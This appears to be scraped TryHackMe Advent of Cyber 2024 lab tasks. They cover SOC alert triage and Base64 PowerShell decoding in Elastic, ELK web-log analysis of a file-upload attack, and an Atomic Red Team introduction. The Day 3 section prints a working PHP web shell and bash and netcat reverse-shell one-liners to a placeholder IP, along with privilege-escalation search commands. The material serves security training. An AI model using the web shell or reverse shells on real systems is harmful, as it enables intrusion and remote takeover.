Looks like the song.mp3 file is not what we expected! Run "exiftool song.mp3" in
your terminal to find out the author of the song. Who is the author?
Login to answer..
The malicious PowerShell script sends stolen info to a C2 server. What is the
URL of this C2 server?
Login to answer..Hint
Who is M.M? Maybe his Github profile page would provide clues?
Login to answer..
What is the number of commits on the GitHub repo where the issue was raised?
Login to answer..Hint
If you enjoyed this task, feel free to check out the OPSEC room!
Login to answer..
What's with all these GitHub repos? Could they hide something else?
Login to answer..
Task 8 Log analysis Day 2: One man's false positive is another man's potpourri.
Task includes a deployable machine
The Story
Click here to watch the walkthrough video!
It’s the most wonderful time of the year again, and it’s also the most stressful
day for Wareville’s Security Operations Center (SOC) team. Despite the
overwhelming alerts generated by the new and noisy rules deployed, Wareville’s
SOC analysts have been processing them nonstop to ensure the safety of the town.
However, the SOC analysts are now burning out of all the workload needed before
Christmas. Numerous open cases are still pending, and similar alerts are still
firing repeatedly, making them think of the possibility of false positives out
of all this mess.
Now, help the awesome Wareville’s SOC team analyse the alerts to determine
whether the rumour is true—that Mayor Malware is instigating chaos within the
town.
TRUE POSITIVES OR FALSE POSITIVES?
In a SOC, events from different devices are sent to the SIEM, which is the
single source of truth where all the information and events are aggregated.
Certain rules (Detection Engineering rules) are defined to identify malicious or
suspicious activity from these events. If an event or set of events fulfils the
conditions of a rule, it triggers an alert. A SOC analyst then analyses the
alert to identify if the alert is a True Positive (TP) or a False Positive (FP).
An alert is considered a TP if it contains actual malicious activity. On the
flip side, if the alert triggers because of an activity that is not actually
malicious, it is considered an FP. This might seem very simple in theory, but
practically, separating TPs from FPs can be a tedious job. It can sometimes
become very confusing to differentiate between an attacker and a system
administrator.
MAKING A DECISION
While it is confusing to differentiate between TPs and FPs, it is very crucial
to get it right. If a TP is falsely classified as an FP, it can lead to a
significant impact from a missed cyber attack. If an FP is falsely classified as
a TP, precious time will be spent focusing on the FP, which might lead to less
focus on an actual attack. So, how exactly do we ensure that we perform this
crucial job effectively? We can use the below pointers to guide us.
Using the SOC Superpower
The SOC has a superpower. When they are unsure whether an activity is performed
by a malicious actor or a legitimate user, they can just confirm with the user.
This privilege is not available to the attacker. A SOC analyst, on the other
hand, can just send an email or call the relevant person to get confirmation of
a certain activity. In mature organisations, any changes that might trigger an
alert in the SOC often require Change Requests to be created and approved
through the IT change management process. Depending on the process, the SOC team
can ask the users to share Change Request details for confirmation. Surely, if
it is a legitimate and approved activity, it must have an approved Change
Request.
Context
While it might seem like using the SOC superpower makes things super easy, that
is not always the case. There are cases which can act as Kryptonite to the SOC
superpower:
* If an organisation doesn't have a change request process in place.
* The performed activity was outside the scope of the change request or was
different from that of the approved change request.
* The activity triggered an alert, such as copying files to a certain location,
uploading a file to some website, or a failed login to a system.
* An insider threat performed an activity they are not authorised to perform,
whether intentionally or unintentionally.
* A user performed a malicious activity via social engineering from a threat
actor.
In such scenarios, it is very important for the SOC analyst to understand the
context of the activity and make a judgement call based on their analysis skills
and security knowledge. While doing so, the analyst can look at the past
behaviour of the user or the prevalence of a certain event or artefact
throughout the organisation or a certain department. For example, if a certain
user from the network team is using Wireshark, there is a chance that other
users from the same team also use Wireshark. However, Wireshark seen on a
machine belonging to someone from HR or finance should rightfully raise some
eyebrows.
Correlation
When building the context, the analyst must correlate different events to make a
story or a timeline. Correlation entails using the past and future events to
recreate a timeline of events. When performing correlation, it is important to
note down certain important artefacts that can then be used to connect the dots.
These important artefacts can include IP addresses, machine names, user names,
hashes, file paths, etc.
Correlation requires a lot of hypothesis creation and ensuring that the evidence
supports that hypothesis. A hypothesis can be something like the user downloaded
malware from a spoofed domain. The evidence to support this can be proxy logs
that support the hypothesis that a website was visited, the website used a
spoofed domain name, and a certain file was downloaded from that website. Now,
let's say, we want to identify whether the malware executed through some
vulnerability in an application or a user intentionally executed the malware. To
see that, we might look at the parent process of the malware and the command
line parameters used to execute the said malware. If the parent process is
Windows Explorer, we can assume the user executed the malware intentionally (or
they might have been tricked into executing it via social engineering), but if
the parent process is a web browser or a word processor, we can assume that the
malware was not intentionally executed, but it was executed because of a
vulnerability in the said application.
IS THIS A TP OR AN FP?
Similar to every SOC, the analysts in the Wareville SOC also need to
differentiate TPs from FPs. This becomes especially difficult for them near
Christmas when the analysts face alert fatigue. High chances of
misclassification of TPs into FPs and vice versa are present in such times. The
analysts, therefore, appreciate any help they could get from us in this crucial
time. To make matters worse, the office of the Mayor has sent the analysts an
alert informing them of multiple encoded powershell commands run on their
systems. Perhaps we can help with that.
Connection Details
To help the analysts, we must start the Elastic SIEM in the attached VM by
clicking the Start Machine button below. The instance takes 5 minutes to
initialise and for the Elastic login page to appear.
Start Machine
Once the machine is up and running, we can connect to the Elastic SIEM by
visiting https://LAB_WEB_URL.p.thmlabs.com in your browser using the following
credentials:
URL https://LAB_WEB_URL.p.thmlabs.com Username elastic Password elastic
Once we log in, we can click the menu in the top-left corner and go to the
Discover tab to see the events.
According to the alert sent by the Mayor's office, the activity occurred on Dec
1st, 2024, between 0900 and 0930. We can set this as our time window by clicking
the timeframe settings in the upper-right corner. Note that we need to click the
Absolute tab and set the exact timeframe we want to view. Lastly, click the
Update button to apply the changes.
After updating the settings, we see 21 events in the mentioned timeframe.
In their current form, these events don't look very easily readable. We can use
the fields in the left pane to add columns to the results and make them more
readable. Hovering on the field name in the left pane will allow adding that
field as a column, as shown below.
Since we are looking for events related to PowerShell, we would like to know the
following details about the logs.
* The hostname where the command was run. We can use the host.hostname field as
a column for that.
* The user who performed the activity. We can add the user.name field as a
column for this information.
* We will add the event.category field to ensure we are looking at the correct
event category.
* To know the actual commands run using PowerShell, we can add the
process.command_line field.
* Finally, to know if the activity succeeded, we will add the event.outcome
field.
Once we have added these fields as columns, we will see the results in a format
like this.
Interesting! So, it looks like someone ran the same encoded PowerShell command
on multiple machines. Another thing to note here is that before each execution
of the PowerShell command, we see an authentication event, which was successful.
This activity is observed individually on each machine, and the time difference
between the login and PowerShell commands looks very precise. Best practices
dictate that named accounts are used for any kind of administrator activity so
that there is accountability and attribution for each administrative activity
performed. The usage of a generic admin account here also seems suspicious. On
asking, the analysts informed us that this account is used by two administrators
who were not in the office when this activity occurred. Hmmm, something is
definitely not right. Are these some of Glitch's shenanigans? Is Christmas in
danger? We need to find out who ran these commands.
Let's also add the source.ip field as a column to find out who ran the
PowerShell commands.
Since the source.ip field is only available for the authentication events, we
can filter out the process events to see if there is a pattern. To do that, we
can hover over the event.category field in one of the process events. We will
see the option to filter only for this value (+ sign) or filter out the value (-
sign), as seen below. Let's filter for authentication events by clicking the
plus (+) sign beside it to show only those in the results.
As a result, you can see that the output only renders the authentication events.
Since the result does not give useful insights, let's remove it for now. You can
do this by clicking the x beside the filter.
Since the timeframe we previously used was for the PowerShell events, and the
authentication events might have been coming from before that, we will need to
expand the search to understand the context and the historical events for this
user. Let's see if we have any events from the user from the 29th of November to
the 1st of December. Updating the time filter for these days, the results look
like this.
Note: Remember to remove the event.category filter before this step.
Woah, there have been more than 6800 events in these three days, and we see a
spike at the end of the logs. However, even though we used the time filter for
the day end on the 1st of December, we see no events after successful PowerShell
execution. There have also been a lot more authentication events in the previous
days than on the 1st of December.
To understand the events further, let's filter for our user.name with
service_admin and source.ip with 10.0.11.11 to narrow our search.
Uh-oh! It looks like all these events have been coming from the same user and
the same IP address. We definitely need to investigate further. This also does
not explain the spike. Let's filter for authentication events first by clicking
the plus (+) button beside it.
Moreover, let's filter out the Source IP here to see if we can find the IP
address that caused the spike. This can be done by clicking the minus (-) button
beside it.
After applying the filters, the expected result will be similar to the image
below.
Scrolling down, we see many events for failed logins. We also see that the IP
address for the spike (ending in .255.1) differs from the one we saw for the
events continuously coming in the previous days (10.0.11.11). The analysts have
previously investigated this and found that a script with expired credentials
was causing this issue. However, that script was updated with a fresh set of
credentials. Anyhow, this might just be another script. Let's find out.
Let's remove the source IP filter so we can focus on authentication events close
to the spike. After applying the new filter, we see that the failed logins
stopped a little while after the successful login from the new IP.
Our suspicions are rising. It seems that someone tried a brute-force attack on
December 1st, as shown by the same filters applied above.
The results also showed that they succeeded with the brute-force attempt because
of the successful authentication attempt and quickly ran some PowerShell
commands on the affected machines. Once the PowerShell commands were run, we
didn't see any further login attempts. This looks like a TP, and there needs to
be an escalation so that McSkidy can help us respond to this incident.
CHRISTMAS IN DANGER?
The alarms have gone off, and McSkidy has been called to help take this incident
further. The analysts have briefed McSkidy about the incident. McSkidy observed
that nobody had actually looked at what the PowerShell command contained. Since
the command was encoded, it needs to be decoded. McSkidy changed the filters
with event.category: process to take a deeper look at the PowerShell commands.
We can see the PowerShell command in the process.command_line field.
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -EncodedCommand
SQBuAHMAdABhAGwAbAAtAFcAaQBuAGQAbwB3AHMAVQBwAGQAYQB0AGUAIAAtAEEAYwBjAGUAcAB0AEEAbABsACAALQBBAHUAdABvAFIAZQBiAG8AbwB0AA==
McSkidy knows that Encoded PowerShell commands are generally Base64 Encoded and
can be decoded using tools such as CyberChef. Since the command might contain
some sensitive information and, therefore, must not be submitted on a public
portal, McSkidy spins up her own instance of CyberChef hosted locally. McSkidy
started by pasting the encoded part of the command in the Input pane in
CyberChef.
Since it is a Base64 encoded command, McSkidy used two recipes, named
FromBase64 and Decode text from the left pane. Note that McSkidy configured the
Decode text to UTF-16LE (1200) since it is the encoding used by PowerShell for
Base64.
The result provided a sigh of relief to McSkidy, who had feared that the
Christmas had been ruined. Someone had come in to help McSkidy and the team
secure their defences, but who?
VILLAIN OR HERO?
McSkidy further analysed the secret hero and came to a startling revelation. The
credentials for the script in the machines that ran the Windows updates were
outdated. Someone brute-forced the systems and fixed the credentials after
successfully logging in. This was evident from the fact that each executed
PowerShell command was preceded by a successful login from the same Source IP,
causing failed logins over the past few days. And what's even more startling? It
was Glitch who accessed ADM-01 and fixed the credentials after McSkidy confirmed
who owned the IP address.
This meant that the people of Wareville had misunderstood Glitch, who was just
trying to help shore up the defences. But if Glitch was the one helping the
defences, who was trying to sabotage it? Was it the Mayor who informed the SOC
about these 'suspicious' PowerShell commands? Just like alerts aren't always
what they seem in a SOC, so was the case here at Wareville with people. As hard
as it was to differentiate between a TP and an FP, so was the case with the
Mayor and Glitch. However, McSkidy can perhaps use the evidence-based deduction
skills learned in a SOC to make this difference easier for the people of
Wareville.
Answer the questions below
What is the name of the account causing all the failed login attempts?
Login to answer..
How many failed logon attempts were observed?
Login to answer..Hint
What is the IP address of Glitch?
Login to answer..
When did Glitch successfully logon to ADM-01? Format: MMM D, YYYY HH:MM:SS.SSS
Login to answer..Hint
What is the decoded command executed by Glitch to fix the systems of Wareville?
Login to answer..
If you enjoyed this task, feel free to check out the Investigating with ELK
101 room.
Login to answer..
Task 9 Log analysis Day 3: Even if I wanted to go, their vulnerabilities
wouldn't allow it.
Task includes a deployable machine
The Story
Click here to watch the walkthrough video!
Today's AoC challenge follows a rather unfortunate series of events for the
Glitch. Here is a little passage which sets the scene for today's task:
Late one Christmas evening the Glitch had a feeling,
Something forgotten as he stared at the ceiling.
He got up out of bed and decided to check,
A note on his wall: ”Two days! InsnowSec”.
With a click and a type he got his hotel and tickets,
And sank off to sleep to the sound of some crickets.
Luggage in hand, he had arrived at Frosty Pines,
“To get to the conference, just follow the signs”.
Just as he was ready the Glitch got a fright,
An RCE vulnerability on their website ?!?
He exploited it quick and made a report,
But before he could send arrived his transport.
In the Frosty Pines SOC they saw an alert,
This looked quite bad, they called an expert.
The request came from a room, but they couldn’t tell which,
The logs saved the day, it was the room of…the Glitch.
In this task, we will cover how the SOC team and their expert were able to find
out what had happened (Operation Blue) and how the Glitch was able to gain
access to the website in the first place (Operation Red). Let's get started,
shall we?
LEARNING OBJECTIVES
* Learn about Log analysis and tools like ELK.
* Learn about KQL and how it can be used to investigate logs using ELK.
* Learn about RCE (Remote Code Execution), and how this can be done via
insecure file upload.
CONNECTING TO THE MACHINE
Before moving forward, review the questions in the connection card below:
Click on the green Start Machine button below to start the virtual machine for
the practical. The practical VM may take 5 minutes to become accessible.
Start Machine
You will also need to start the AttackBox by pressing the Start AttackBox button
at the top of the room. Alternatively, you can connect your own hacking machine
by using the TryHackMe VPN.
OPERATION BLUE
In this section of the lesson, we will take a look at what tools and knowledge
is required for the blue segment, that is the investigation of the attack itself
using tools which enable is to analyse the logs.
For the first part of Operation Blue, we will demonstrate how to use ELK to
analyse the logs of a demonstration web app - WareVille Rails. Feel free to
following along for practice.
LOG ANALYSIS & INTRODUCING ELK
Log analysis is crucial to blue-teaming work, as you have likely discovered
through this year's Advent of Cyber.
Analysing logs can quickly become overwhelming, especially if you have multiple
devices and services. ELK, or Elasticsearch, Logstash, and Kibana, combines data
analytics and processing tools to make analysing logs much more manageable. ELK
forms a dedicated stack that can aggregate logs from multiple sources into one
central place.
Explaining how ELK collates and processes these logs is out of the scope of
today's task. However, if you wish to learn more, you can check out the
Investigating with ELK 101 room. For now, it's important to note that multiple
processes behind the scenes achieve this.
The first part of today's task is to investigate the attack on Frosty Pines
Resort's Hotel Management System to see what it looks like to a blue teamer. You
will then test your web app skills by recreating the attack.
USING ELK
Upon loading the URL http://MACHINE_IP:5601/ within your AttackBox’s browser,
you will be greeted with the ELK Home page.
For today's task, we will use Kibana's Discover interface to review Apache2
logs. To access this, simply click on the three lines located at the top left of
the page to open the slide-out tray. Under the Analytics heading, click on
Discover.
We will need to select the collection that is relevant to us. A collection is a
group of logs. For this stage of Operation Blue, we will be reviewing the logs
present within the "wareville-rails" collection. To select this collection,
click on the dropdown on the left of the display.
Once you have done this, you will be greeted with a screen saying, "No results
match your search criteria". This is because no logs have been ingested within
the last 15 minutes. Do not panic; we will discuss how to change this shortly.
To change the date and time, click the text located on the right side of the box
that has the calendar icon. Select "Absolute" from the dropdown, where you can
now select the start date and time. Next, click on the text on the right side of
the arrow to and repeat the process for the end date and time.
For the WareVille Rails collection, we will need to set the start time to
October 1 2024 00:00:00, and the end time to October 1 23:30:00
If you are stuck, refer to the GIF below. Please note that the day and time in
this demonstration of WareVille Rails will differ from the times required to
review the FrostyPines Resorts collection in the second half of the practical.
Now that we can see some entries, let's go over the basics of the Kibana
Discover UI.
1. Search Bar: Here, we can place our search queries using KQL
2. Index Pattern: An index pattern is a collection of logs. This can be from a
specific host or, for example, multiple hosts with a similar purpose (such
as multiple web servers). In this case, the index pattern is all logs
relating to "wareville-rails"
3. Fields: This pane shows us the fields that Elasticsearch has parsed from the
logs. For example, timestamp, response type, and IP address.
4. Timeline: This visualisation displays the event count over a period of time
5. Documents (Logs): These entries are the specific entries in the log file
6. Time Filter: We can use this to narrow down a specific time frame
(absolute). Alternatively, we can search for logs based on relativity.
I.e. "Last 7 days".
KIBANA QUERY LANGUAGE (KQL)
KQL, or Kibana Query Language, is an easy-to-use language that can be used to
search documents for values. For example, querying if a value within a field
exists or matches a value. If you are familiar with Splunk, you may be thinking
of SPL (Search Processing Language).
For example, the query to search all documents for an IP address may look
like ip.address: "10.10.10.10".
Alternatively, Kibana also allows using Lucene query, an advanced language that
supports features such as fuzzy terms (searches for terms that are similar to
the one provided), regular expressions, etc. For today's task, we will stick
with using KQL, which has been enabled by default. The table below contains a
mini-cheatsheet for KQL syntax that you may find helpful in today's task.
Query/SyntaxDescriptionExample" "The two quotation marks are used to search for
specific values within the documents. Values in quotation marks are used
for exact searches."TryHackMe"*The asterisk denotes a wildcard, which searches
documents for similar matches to the value provided.United* (would return United
Kingdom and United States)ORThis logical operator is used to show documents that
contain either of the values provided."United Kingdom" OR "England"ANDThis
logical operator is used to show documents that contain both values."Ben" AND
"25":This is used to search the (specified) field of a document for a value,
such as an IP address. Note that the field you provide here will depend on the
fields available in the index pattern.ip.address: 10.10.10.10
INVESTIGATING A WEB ATTACK WITH ELK
Scenario: Thanks to our extensive intrusion detection capabilities, our systems
alerted the SOC team to a web shell being uploaded to the WareVille Rails
booking platform on Oct 1, 2024. Our task is to review the web server logs to
determine how the attacker achieved this.
If you would like to follow along, ensure that you have the "wareville-rails"
collection selected like so:
To investigate this scenario, let's change the time filter to show events for
the day of the attack, setting the start date and time to "Oct 1, 2024 @
00:00:00.000" and the end date and time to "Oct 2, 2024 @ 00:00:00.000".
You will see the logs have now populated within the display. Please note that
the quantity of entries (hits) in this task may differ to the amount on the
practical VM.
An incredibly beneficial feature of ELK is that we can filter out noise. A web
server (especially a popular one) will likely have a large number of logs from
user traffic—completely unrelated to the attack. Using the fields pane on the
left, we can click on the "+" and "-" icons next to the field to show only that
value or to remove it from the display, respectively.
Fun fact: Clicking on these filters is actually just applying the relevant KQL
syntax.
Note in the GIF below how the logs are being filtered to only show logs
containing the IP address 10.13.27.115 (reducing the count from 1,028 to 423
hits). We can combine filtering multiple fields in or out to drill down
specifically into the logs.
To remove applied filters, simply click on the "x" alongside the filter, just
below the search bar.
In this investigation, let's look at the activity of the IP address
10.9.98.230. We can click on the "clientip" field to see the IPs with the most
values.
Using the timeline at the top, we can see a lot of activity from this IP address
took place between 11:30:00 and 11:35:00. This would be a good place to begin
our analysis.
Each log can be expanded by using the ">" icon located on the left of the
log/document. Fortunately, the logs are pretty small in this instance, so we can
browse through them to look for anything untoward.
After some digging, a few logs stand out. Looking at the request field, we can
see that a file named "shell.php" has been accessed, with a few parameters
"c" and "d" containing commands. These are likely to be commands input into some
form of web shell.
Now that we have an initial lead, let’s use a search query to find all logs that
contain "shell.php". Using the search bar at the top, the query message:
"shell.php" will search for all entries of "shell.php" in the message field of
the logs.
OPERATION RED
In this section we will now take a look at the red aspect. In other words, the
attack itself and how it was carried out.
WHY DO WEBSITES ALLOW FILE UPLOADS
FILE UPLOADS ARE EVERYWHERE ON WEBSITES, AND FOR GOOD REASON. USERS OFTEN NEED
TO UPLOAD FILES LIKE PROFILE PICTURES, INVOICES, OR OTHER DOCUMENTS TO UPDATE
THEIR ACCOUNTS, SEND RECEIPTS, OR SUBMIT CLAIMS. THESE FEATURES MAKE THE USER
EXPERIENCE SMOOTHER AND MORE EFFICIENT. BUT WHILE THIS IS CONVENIENT, IT ALSO
CREATES A RISK IF FILE UPLOADS AREN'T HANDLED PROPERLY. IF NOT PROPERLY SECURED,
THIS FEATURE CAN OPEN UP VARIOUS VULNERABILITIES ATTACKERS CAN EXPLOIT.
FILE UPLOAD VULNERABILITIES
File upload vulnerabilities occur when a website doesn't properly handle the
files that users upload. If the site doesn't check what kind of file is being
uploaded, how big it is, or what it contains, it opens the door to all sorts of
attacks. For example:
* RCE: Uploading a script that the server runs gives the attacker control over
it.
* XSS: Uploading an HTML file that contains an XSS code which will steal a
cookie and send it back to the attacker's server.
These can happen if a site doesn't properly secure its file upload
functionality.
WHY UNRESTRICTED FILE UPLOADS ARE DANGEROUS
Unrestricted file uploads can be particularly dangerous because they allow an
attacker to upload any type of file. If the file's contents aren't properly
validated to ensure only specific formats like PNG or JPG are accepted, an
attacker could upload a malicious script, such as a PHP file or an executable,
that the server might process and run. This can lead to code execution on the
server, allowing attackers to take over the system.
Examples of abuse through unrestricted file uploads include:
* Uploading a script that the server executes, leading to RCE.
* Uploading a crafted image file that triggers a vulnerability when processed
by the server.
* Uploading a web shell and browsing to it directly using a browser.
USAGE OF WEAK CREDENTIALS
One of the easiest ways for attackers to break into systems is through weak or
default credentials. This can be an open door for attackers to gain unauthorised
access. Default credentials are often found in systems where administrators fail
to change initial login details provided during setup. For attackers, trying a
few common usernames and passwords can lead to easy access.
Below are some examples of weak/default credentials that attackers might try:
UsernamePasswordadminadminadministratoradministratoradmin@domainnameadminguestguest
Attackers can use tools or try these common credentials manually, which is often
all it takes to break into the system.
WHAT IS REMOTE CODE EXECUTION (RCE)
Remote code execution (RCE) happens when an attacker finds a way to run their
own code on a system. This is a highly dangerous vulnerability because it can
allow the attacker to take control of the system, exfiltrate sensitive data, or
compromise other connected systems.
WHAT IS A WEB SHELL
A web shell is a script that attackers upload to a vulnerable server, giving
them remote control over it. Once a web shell is in place, attackers can run
commands, manipulate files, and essentially use the compromised server as their
own. They can even use it to launch attacks on other systems.
For example, attackers could use a web shell to:
* Execute commands on the server
* Move laterally within the network
* Download sensitive data or pivot to other services
A web shell typically gives the attacker a web-based interface to run commands.
Still, in some cases, attackers may use a reverse shell to establish a direct
connection back to their system, allowing them to control the compromised
machine remotely. Once an attacker has this level of access, they might attempt
privilege escalation to gain even more control, such as achieving root access or
moving deeper into the network.
Okay, now that we're familiar with a remote code execution vulnerability and how
it works, let's take a look at how we would exploit it!
PRACTICE MAKES PERFECT
To understand how a file upload vulnerability can result in an RCE, the best
approach is to get some hands-on experience with it. A handy (and ethical) way
to do this is to find and download a reputable open-source web application which
has this vulnerability built into it. Many open-source projects exist in places
like GitHub, which can be run in your own environment to experiment and
practice. In today's task, we will demonstrate achieving RCE via unrestricted
file upload within an open-source railway management system that has this
vulnerability built into it.
EXPLOITING RCE VIA FILE UPLOAD
Now we're going to go through how this vulnerability can be exploited. For now,
you can just read along, but an opportunity to put this knowledge into practice
is coming up. Once an RCE vulnerability has been identified that can be
exploited via file upload, we now need to create a malicious file that will
allow remote code execution when uploaded.
Below is an example PHP file which could be uploaded to exploit this
vulnerability. Using your favourite text editor, copy and paste the below code
and save it as shell.php.
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="command" autofocus id="command" size="50">
<input type="submit" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['command']))
{
system($_GET['command'] . ' 2>&1');
}
?>
</pre>
</body>
</html>
The above script, when accessed, displays an input field. Whatever is entered in
this input field is then run against the underlying operating system using the
system() PHP function, and the output is displayed to the user. This is the
perfect file to upload to the vulnerable rail system reservation application.
The vulnerability is surrounding the upload of a new profile image. So, to
exploit it, we navigate to the profile picture page:
Instead of a new profile picture, we can upload our malicious PHP script and
update our profile:
In the case of this application, the RCE is possible through unrestricted file
upload. Once this "profile picture" is uploaded and updated, it is stored in the
/admin/assets/img/profile/ directory. The file can then be accessed directly via
http://<ip-address-or-localhost>/<projectname>/admin/assets/img/profile/shell.php.
When this is accessed, we can then see the malicious code in action:
Now, we can run commands directly against the operating system using this bar,
and the output will be displayed. For example, running the command pwd now
returns the following:
MAKING THE MOST OF IT
Once the vulnerability has been exploited and you now have access to the
operating system via a web shell, there are many next steps you could take
depending on a) what your goal is and b) what misconfigurations are present on
the system, which will determine exactly what we can do. Here are some examples
of commands you could run once you have gained access and why you might run them
(if the system is running on a Linux OS like our example target system):
Command Use ls Will give you an idea of what files/directories surround you catA
command used to output the contents of documents such as text files pwd Will
give you an idea of where in the system you are whoami Will let you know who you
are in the system hostname The system name and potentially its role in the
network uname -a Will give you some system information like the OS, kernel
version, and more id If the current user is assigned to any groups ifconfig
Allows you to understand the system's network setup bash -i >&
/dev/tcp/<your-ip>/<port> 0>&1 A command used to begin a reverse shell via bash
nc -e /bin/sh <your-ip> <port> A command used to begin a reverse shell via
Netcat find / -perm -4000 -type f 2>/dev/null Finds SUID (Set User ID) files,
useful in privilege escalation attempts as it can sometimes be leveraged to
execute binary with privileges of its owner (which is often root) find /
-writable -type f 2>/dev/null | grep -v "/proc/" Also helpful in privilege
escalation attempts used to find files with writable permissions
These are just some commands that can be run following a successful RCE exploit.
It's very open-ended, and what you can do will rely on your abilities to inspect
an environment and vulnerabilities in the system itself.
PRACTICAL
Your task today is two-fold. First, you must access Kibana on MACHINE_IP:5601 to
investigate the attack and answer the blue questions below. Then, you will
proceed to Frosty Pines Resort's website at http://frostypines.thm and recreate
the attack to answer the red questions and inform the developers what element of
the website was vulnerable.
Please note, to access http://frostypines.thm, you will need to reference it
within your hosts file. On the AttackBox, this can be done by executing the
following command in a terminal: echo "MACHINE_IP frostypines.thm" >> /etc/hosts
If you do not see an IP address (i.e. 10.10.x.x) and only MACHINE IP, ensure
that you have started the target machine by pressing on the green "Start
Machine" button further up the task, within the heading "Connecting to the
Machine".
To review the logs of the attack on Frosty Pines Resorts, make sure you select
the "frostypines-resorts" collection within ELK. Such as below:
The date and time that you will need to use when reviewing logs will be between
11:30 and 12:00 on October 3rd 2024.
Remember, to access the Frosty Pines Resorts website
(http://frostypines.thm), you will need to reference it in your hosts file. On
the AttackBox, this can be done by executing the following command in a
terminal: echo "MACHINE_IP frostypines.thm" >> /etc/hosts
Answer the questions below
BLUE: Where was the web shell uploaded to?
Answer format: /directory/directory/directory/filename.php
Login to answer..Hint
BLUE: What IP address accessed the web shell?
Login to answer..Hint
RED: What is the contents of the flag.txt?
Login to answer..
If you liked today's task, you can learn how to harness the power of advanced
ELK queries.
Login to answer..
Task 10 Atomic Red Team Day 4: I’m all atomic inside!
Task includes a deployable machine
The Story
Click here to watch the walkthrough video!
SOC-mas is approaching! And the town of Warewille started preparations for the
grand event.
Glitch, a quiet, talented security SOC-mas engineer, had a hunch that these
year's celebrations would be different. With looming threats, he decided to
revamp the town's security defences. Glitch began to fortify the town's security
defences quietly and meticulously. He started by implementing a protective
firewall, patching vulnerabilities, and accessing endpoints to patch for
security vulnerabilities. As he worked tirelessly, he left "breadcrumbs," small
traces of his activity.
Unaware of Glitch's good intentions, the SOC team spotted anomalies: Logs
showing admin access, escalation of privileges, patched systems behaving
differently, and security tools triggering alerts. The SOC team misinterpreted
the system modifications as a sign of an insider threat or rogue attacker and
decided to launch an investigation using the Atomic Red Team framework.
LEARNING OBJECTIVES
* Learn how to identify malicious techniques using the MITRE ATT&CK framework.
* Learn about how to use Atomic Red Team tests to conduct attack simulations.
* Understand how to create alerting and detection rules from the attack tests.
CONNECTING TO THE MACHINE
Before moving forward, review the questions in the connection card below:
Click on the green Start Machine button below to start the virtual machine and
wait 1-2 minutes for the system to boot completely in a split-screen view.
Start Machine
If the virtual machine isn't visible, use the blue Show Split View button at the
top of the page.
Additionally, if you wish to connect to the machine via RDP, use the credentials
below:
Username Administrator Password Emulation101! IP MACHINE_IP
The VM has Atomic Red Team and Sysmon installed. This will allow us to emulate
an attack using TTPs described in the MITRE ATT&CK framework.
DETECTION GAPS
While it might be the utopian dream of every blue teamer, we will rarely be able
to detect every attack or step in an attack kill chain. This is a reality that
all blue teamers face: there are gaps in their detection. But worry not! These
gaps do not have to be the size of black holes; there are things we can do to
help make these gaps smaller.
Detection gaps are usually for one of two main reasons:
* Security is a cat-and-mouse game. As we detect more, the threat actors and
red teamers will find new sneaky ways to thwart our detection. We then need
to study these novel techniques and update our signature and alert rules to
detect these new techniques.
* The line between anomalous and expected behaviour is often very fine and
sometimes even has significant overlap. For example, let's say we are a
company based in the US. We expect to see almost all of our logins come from
IP addresses in the US. One day, we get a login event from an IP in the EU,
which would be an anomaly. However, it could also be our CEO travelling for
business. This is an example where normal and malicious behaviour intertwine,
making it hard to create accurate detection rules that would not have too
much noise.
Blue teams constantly refine and improve their detection rules to close the gaps
they experience due to the two reasons mentioned above. Let's take a look at how
this can be done!
CYBER ATTACKS AND THE KILL CHAIN
Before diving into creating new detection rules, we first have to discuss some
key topics. The first topic to discuss is the Cyber Kill chain. All cyber
attacks follow a fairly standard process, which is explained quite well by the
Unified Cyber Kill chain:
As a blue teamer, it would be our dream to prevent all attacks at the start of
the kill chain. So even just when threat actors start their reconnaissance, we
already stop them dead in their tracks. But, as discussed before, this is not
possible. The goal then shifts slightly. If we are unable to fully detect and
prevent a threat actor at any one phase in the kill chain, the goal becomes to
perform detections across the entire kill chain in such a way that even if there
are detection gaps in a single phase, the gap is covered in a later phase. The
goal is, therefore, to ensure we can detect the threat actor before the very
last phase of goal execution.
MITRE ATT&CK
A popular framework for understanding the different techniques and tactics that
threat actors perform through the kill chain is the MITRE ATT&CK framework. The
framework is a collection of tactics, techniques, and procedures that have been
seen to be implemented by real threat actors. The framework provides a navigator
tool where these TTPs can be investigated:
However, the framework primarily discusses these TTPs in a theoretical manner.
Even if we know we have a gap for a specific TTP, we don't really know how to
test the gap or close it down. This is where the Atomics come in!
ATOMIC RED
The Atomic Red Team library is a collection of red team test cases that are
mapped to the MITRE ATT&CK framework. The library consists of simple test cases
that can be executed by any blue team to test for detection gaps and help close
them down. The library also supports automation, where the techniques can be
automatically executed. However, it is also possible to execute them manually.
DROPPING THE ATOMIC
McSkidy has a vague idea of what happened to the "compromised machine." It seems
someone tried to use the Atomic Red Team to emulate an attack on one of our
systems without permission. The perpetrator also did not clean up the test
artefacts. Let's have a look at what happened.
RUNNING AN ATOMIC
McSkidy suspects that the supposed attacker used the MITRE ATT&CK
technique T1566.001 Spearphishing with an attachment. Let's recreate the attack
emulation performed by the supposed attacker and then look for the artefacts
created.
Open up a PowerShell prompt as administrator and follow along with us. Let's
start by having a quick peek at the help page. Enter the command Get-Help
Invoke-Atomictest. You should see the output below:
Administrator: Windows PowerShell
PS C:\Users\Administrator> Get-Help Invoke-Atomictest
NAME
Invoke-AtomicTest
SYNTAX
Invoke-AtomicTest [-AtomicTechnique] <string[]> [-ShowDetails] [-ShowDetailsBrief] [-TestNumbers <string[]>]
[-TestNames <string[]>] [-TestGuids <string[]>] [-PathToAtomicsFolder <string>] [-CheckPrereqs]
[-PromptForInputArgs] [-GetPrereqs] [-Cleanup] [-NoExecutionLog] [-ExecutionLogPath <string>] [-Force] [-InputArgs<hashtable>] [-TimeoutSeconds <int>] [-Session <PSSession[]>] [-Interactive] [-KeepStdOutStdErrFiles]
[-LoggingModule <string>] [-WhatIf] [-Confirm] [<CommonParameters>]
ALIASES
None
REMARKS
None
The help above only shows what parameters are available without any explanation.
Even though most parameter names are self-explanatory, let us have a quick
overview of the parameters we will use in this walkthrough:
Parameter Explanation Example use
-Atomic Technique
This defines what technique you want to emulate. You can use the complete
technique name or the "TXXXX" value. This flag can be omitted.
Invoke-AtomicTest -AtomicTechnique T1566.001
-ShowDetails
Shows the details of each test included in the Atomic.
Invoke-AtomicTest T1566.001 -ShowDetails
